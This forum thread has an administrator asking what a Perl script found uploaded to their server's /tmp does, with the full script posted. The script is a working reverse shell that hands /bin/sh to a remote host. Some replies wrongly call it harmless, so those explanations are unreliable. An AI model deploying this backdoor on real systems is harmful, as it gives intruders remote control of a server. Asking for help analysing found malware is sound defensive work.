Hacking Perl Script

[falco85]

I was looking through my log files and happened by a file upload that should not have been uploaded (through a script somehow they managed to upload although they shouldn't have access). I then immediatly went to the directory the script was inserted into "/tmp" and opened the file. The first line reads #!/usr/bin/perl and even though I have used perl before I still don't entirely understand what this script does.

Perl Code:

#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR); 

I can see that it opens lynx and connects to the local machine but what does this do:

Perl Code:

$system= 'echo "`uname -a`";echo "`id`";/bin/sh'; 

I understand echo and uname but is it calling /bin/sh?

From this point down I do not understand. Any of this I do not really understand what it is doing:

Perl Code:

$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR); 

Can someone help me figure out what the intention of this script is?

[KevinADC]

hmmm.... I don't know what it is trying to do. Maybe ask on PerlMonks - The Monastery Gates if you get an answer post back here.

[Lop]

It looks like it is just loading a website. The arguments could be anything though. It doesn't look malicious.

[zosorock]

I believe it is indeed malicious. In my case I was presented with a mailqueue of 9000 emails trying to send out a phising/scam type of email (excerpt below), right after this script showed up.

I am not that good of a server admin but I am pretty sure this script started it somehow.

Excerpt of the email:
The Local Organizing Committee of the Heineken European Champions League is glad to announce to the world the giving away of the sum of TWO HUNDRED MILLION POUNDS to 100 lucky email addresses all over the world.

I hope you didn't have the same problem... it was pretty annoying to delete all those... thankfully they all came from nobody@.

[ETbyrne]

Did you ever find out what it was?

[TkTech]

It in itself is not malicious. It connects to an external server and port passed as parameters to the script and sends all of the detailed system information to that server. Then that can be used to find commmon security flaws for that os/aric